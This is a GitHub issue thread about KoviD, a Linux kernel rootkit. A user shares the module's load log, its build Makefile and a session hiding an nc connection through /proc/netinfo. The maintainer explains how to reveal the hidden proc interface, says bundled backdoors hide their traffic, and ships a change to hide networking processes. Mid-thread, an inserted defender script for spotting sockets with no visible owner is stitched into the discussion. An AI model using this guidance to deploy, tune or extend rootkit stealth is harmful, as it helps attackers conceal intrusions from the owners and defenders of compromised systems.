
Can't find /proc/mytest: No such file or directory #89

Closed
homelanmder opened this issue May 3, 2024 · 10 comments

Comments

@homelanmder

This is the dmesg info:

[  256.042347] kv: using kprobe for kallsyms_lookup_name
[  256.052423] add sysaddr: ffffffff980b4030
[  256.052597] addname '.MXOJKP' ro=1
[  256.052732] new var, filename: '/var/.MXOJKP'
[  256.052902] Installing: 'sys_exit_group' syscall=1
[  256.062506] add sysaddr: ffffffff980a0170
[  256.106895] Installing: 'sys_clone' syscall=1
[  256.115699] add sysaddr: ffffffff980995a0
[  256.156970] Installing: 'sys_kill' syscall=1
[  256.166147] add sysaddr: ffffffff980ae730
[  256.168169] Installing: 'sys_bpf' syscall=1
[  256.178191] add sysaddr: ffffffff981ea760
[  256.295948] Installing: 'tcp4_seq_show' syscall=0
[  256.309552] Installing: 'udp4_seq_show' syscall=0
[  256.505231] Installing: 'tcp6_seq_show' syscall=0
[  256.537411] Installing: 'udp6_seq_show' syscall=0
[  256.541783] Installing: 'packet_rcv' syscall=0
[  256.644986] Installing: 'tpacket_rcv' syscall=0
[  256.774042] Installing: 'account_process_tick' syscall=0
[  256.784509] Installing: 'account_system_time' syscall=0
[  256.802086] Installing: 'audit_log_start' syscall=0
[  256.803673] Installing: 'filldir' syscall=0
[  256.913526] Installing: 'filldir64' syscall=0
[  256.927847] Installing: 'tty_read' syscall=0
[  256.981396] ftrace hook 0 on sys_exit_group
[  256.981576] ftrace hook 1 on sys_clone
[  256.981726] ftrace hook 2 on sys_kill
[  256.981873] ftrace hook 3 on sys_bpf
[  256.982017] ftrace hook 4 on tcp4_seq_show
[  256.982178] ftrace hook 5 on udp4_seq_show
[  256.982339] ftrace hook 6 on tcp6_seq_show
[  256.982501] ftrace hook 7 on udp6_seq_show
[  256.982662] ftrace hook 8 on packet_rcv
[  256.982814] ftrace hook 9 on tpacket_rcv
[  256.982969] ftrace hook 10 on account_process_tick
[  256.983155] ftrace hook 11 on account_system_time
[  256.983420] ftrace hook 12 on audit_log_start
[  256.983593] ftrace hook 13 on filldir
[  256.983739] ftrace hook 14 on filldir64
[  256.983891] ftrace hook 15 on tty_read
[  256.985749] Waiting for event
[  256.990317] hide [000000004489c775] irq/102_pciehp : 8049
[  256.990684] hide [00000000639fa20d] irq/101_pciehp : 8048
[  256.990914] hide [00000000c6a81ef0] irq/100_pciehp : 8047
[  256.991212] addname '.kovid' ro=1
[  256.991357] addname 'kovid' ro=1
[  256.991582] addname '.kv.ko' ro=1
[  256.991822] addname '.lm.sh' ro=1
[  256.991971] addname '.sshd_orig' ro=1
[  256.992117] addname 'whitenose' ro=1
[  256.992261] addname 'pinknose' ro=1
[  256.992401] addname 'rednose' ro=1
[  256.992540] addname 'blacknose' ro=1
[  256.992683] addname 'greynose' ro=1
[  256.992824] addname 'purplenose' ro=1
[  256.992970] addname 'bluenose' ro=1
[  256.993144] kovid loaded.

And this is the Makefile:

OBJNAME=kovid

# turn off ring buffer debug:
# $ DEPLOY=1 make
ifndef DEPLOY
DEBUG_PR := -DDEBUG_RING_BUFFER
endif

LD=$(shell which ld)
AS=$(shell which as)
# note: the original line had a stray trailing ')' which ended up in the CTAGS value
CTAGS=$(shell which ctags)
# PROCNAME, /proc/<name> interface. You must change it.
COMPILER_OPTIONS := -Wall -DPROCNAME='"mytest"' \
	-DMODNAME='"kovid"' -DKSOCKET_EMBEDDED ${DEBUG_PR} -DCPUHACK -DPRCTIMEOUT=1200

EXTRA_CFLAGS := -I$(src)/src -I$(src)/fs ${COMPILER_OPTIONS}

SRC := src/${OBJNAME}.c src/pid.c src/fs.c src/sys.c \
	src/sock.c src/util.c src/vm.c

persist=src/persist

$(OBJNAME)-objs = $(SRC:.c=.o)

obj-m := ${OBJNAME}.o

CC=gcc

# recipe lines must start with a tab, not spaces
all: persist
	make  -C  /lib/modules/$(shell uname -r)/build M=$(PWD) modules

# assemble and link the flat persistence binary
persist:
	$(AS) --64 $(persist).S -statistics -fatal-warnings \
		-size-check=error -o $(persist).o
	$(LD) -Ttext 200000 --oformat binary -o $(persist) $(persist).o

lgtm: persist
	make  -C  /lib/modules/$(shell dpkg --status linux-headers-generic |grep ^Depends| \
		cut -d ":" -f2| sed 's/ linux-headers-//g')/build M=$(PWD) modules

clean:
	@make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
	@rm -f *.o src/*.o $(persist)
	@echo "Clean."

tags:
	$(CTAGS) -RV src/.

.PHONY: all clean tags

And my OS info is:
Linux amazon 5.10.215-203.850.amzn2.x86_64 #1 SMP Tue Apr 23 20:32:19 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux

@carloslack
Owner

The proc interface is hidden by default when you insmod.
Unhide it with kill.

@homelanmder
Author

Very thx. And I have another question: how can I hide a TCP connection? I can understand the gif; maybe I need to edit the source code?

@carloslack
Owner

carloslack commented May 3, 2024

Backdoors included in kv have their traffic hidden along with the processes; no need to change the code for that, but you can create a PR for it or something else.

@homelanmder
Author

I hid a process, but the network connection is still unhidden:

[root@amazon ~]# netstat -anptl
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:111             0.0.0.0:*               LISTEN      6735/rpcbind
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      7181/sshd
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      7138/master
tcp        0      0 192.168.7.144:22        192.168.7.1:53479       ESTABLISHED 24243/sshd: root@pt
tcp        0     36 192.168.7.144:22        192.168.7.1:52758       ESTABLISHED 21713/sshd: root@pt
tcp        0      0 192.168.7.144:8888      192.168.7.1:54475       ESTABLISHED 26267/nc
tcp6       0      0 :::111                  :::*                    LISTEN      6735/rpcbind
tcp6       0      0 :::22                   :::*                    LISTEN      7181/sshd
[root@amazon ~]# echo 26267 > /proc/netinfo
[root@amazon ~]# netstat -anptl
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:111             0.0.0.0:*               LISTEN      6735/rpcbind
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      7181/sshd
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      7138/master
tcp        0      0 192.168.7.144:22        192.168.7.1:53479       ESTABLISHED 24243/sshd: root@pt
tcp        0     36 192.168.7.144:22        192.168.7.1:52758       ESTABLISHED 21713/sshd: root@pt
tcp        0      0 192.168.7.144:8888      192.168.7.1:54475       ESTABLISHED -
tcp6       0      0 :::111                  :::*                    LISTEN      6735/rpcbind
tcp6       0      0 :::22                   :::*                    LISTEN      7181/sshd

I really want to create a PR, but I can't code in C.

@carloslack
Owner

Currently, if you use bdclient.sh you'll have connections hidden without having to change anything. If, for instance, you run, let's say, nc and then use kv to hide it, you'll have the process hidden like any other task; this way they are assumed to be non-networking tasks.
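A defender-side check for the symptom visible in the netstat listing above, where the hidden process's socket shows up with "-" in the PID/Program name column. This is an added example, not code from the thread or the KoviD project: it cross-references socket inodes in /proc/net/tcp against the socket:[inode] links in /proc/<pid>/fd and reports sockets no visible process holds. The /proc/net/tcp text and the pid-to-inode map are constructed to mirror the listing above.

```python
import os
import socket
import struct

TCP_STATES = {"01": "ESTABLISHED", "0A": "LISTEN"}  # other states fall back to raw hex

# Constructed /proc/net/tcp sample: rpcbind listener, sshd session, and the nc
# connection from the listing above (192.168.7.144:8888 <-> 192.168.7.1:54475).
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:006F 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12345 1 0000000000000000 100 0 0 10 0
   1: 9007A8C0:0016 0107A8C0:D0E7 01 00000000:00000000 00:00000000 00000000     0        0 22334 1 0000000000000000 20 4 30 10 -1
   2: 9007A8C0:22B8 0107A8C0:D4CB 01 00000000:00000000 00:00000000 00000000     0        0 33445 1 0000000000000000 20 4 30 10 -1
"""
# Constructed pid -> socket inodes map, as if read from /proc/<pid>/fd; the hidden
# nc process (pid 26267 in the listing) is absent, so inode 33445 has no owner.
SAMPLE_OWNERS = {6735: {12345}, 24243: {22334}}

def hex_addr(field):
    """Decode a /proc/net/tcp 'HEXIP:HEXPORT' field (IPv4 stored little-endian)."""
    ip_hex, port_hex = field.split(":")
    ip = socket.inet_ntoa(struct.pack("<I", int(ip_hex, 16)))
    return f"{ip}:{int(port_hex, 16)}"

def parse_proc_net_tcp(text):
    """Return (local, remote, state, inode) tuples for each row of a /proc/net/tcp dump."""
    rows = []
    for line in text.splitlines()[1:]:  # first line is the column header
        f = line.split()
        if len(f) < 10:
            continue
        rows.append((hex_addr(f[1]), hex_addr(f[2]), TCP_STATES.get(f[3], f[3]), int(f[9])))
    return rows

def socket_inodes_by_pid(proc="/proc"):
    """Map pid -> set of socket inodes by reading /proc/<pid>/fd symlinks (live system)."""
    owners = {}
    for pid in filter(str.isdigit, os.listdir(proc)):
        fd_dir = os.path.join(proc, pid, "fd")
        try:
            links = [os.readlink(os.path.join(fd_dir, fd)) for fd in os.listdir(fd_dir)]
        except OSError:  # process exited mid-scan, or not running as root
            continue
        owners[int(pid)] = {int(l[8:-1]) for l in links if l.startswith("socket:[")}
    return owners

def orphan_sockets(rows, owners):
    """Rows whose inode no visible process holds; inode 0 (e.g. TIME_WAIT) is skipped."""
    known = set().union(*owners.values()) if owners else set()
    return [r for r in rows if r[3] != 0 and r[3] not in known]

if __name__ == "__main__":
    for row in orphan_sockets(parse_proc_net_tcp(SAMPLE_PROC_NET_TCP), SAMPLE_OWNERS):
        print("socket without visible owner:", row)
```

On a live host, feed `parse_proc_net_tcp(open("/proc/net/tcp").read())` and `socket_inodes_by_pid()` into `orphan_sockets`; kernel-owned sockets also have no owning fd, so hits are triage leads rather than proof. Where tcp4_seq_show itself is hooked (the dmesg above shows kv installing that hook for its own backdoor traffic), the row never appears in /proc/net/tcp, so this check only covers the hidden-process case the listing demonstrates.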

@homelanmder
Author

I understand, thx very much.

carloslack added and then removed the "enhancement" (New feature or request) label on May 3, 2024.
@carloslack
Owner

No worries, I may soon change the code to consider certain processes as networking type.

@homelanmder
Author

I'm really expecting it, bro.

@carloslack
Owner

@homelanmder have a look at #90 and test whether it works for you.

@carloslack
Owner

Closed by af60d88
